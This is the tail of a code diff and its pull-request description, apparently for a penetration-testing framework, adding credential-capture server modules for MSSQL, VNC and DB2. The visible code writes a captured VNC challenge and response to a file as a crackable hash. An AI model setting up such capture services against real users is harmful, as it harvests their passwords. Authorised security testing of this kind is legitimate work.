+				fd.puts "$vnc$*#{@state[c][:chall].unpack("H*")}*#{data.unpack('H*')}"
+				fd.close
+			end
+		end
+	end
+
+	def on_client_close(c)
+		@state.delete(c)
+	end
+end


### PR DESCRIPTION
I've created 3 more capture services for Microsoft SQL Server, VNC and IBM DB2.

Testing should be pretty straight forward:
mssql.rb - start the module and connect using either osql or the mssql enterprise manager using either database- or windows- authentication.

vnc.rb - start the module and connect to the server using a vnc client. I've been using the built in client in OS X for testing.

drda.rb - start the module and connect to the server using the db2 data studio or any other jdbc based db2 utility.
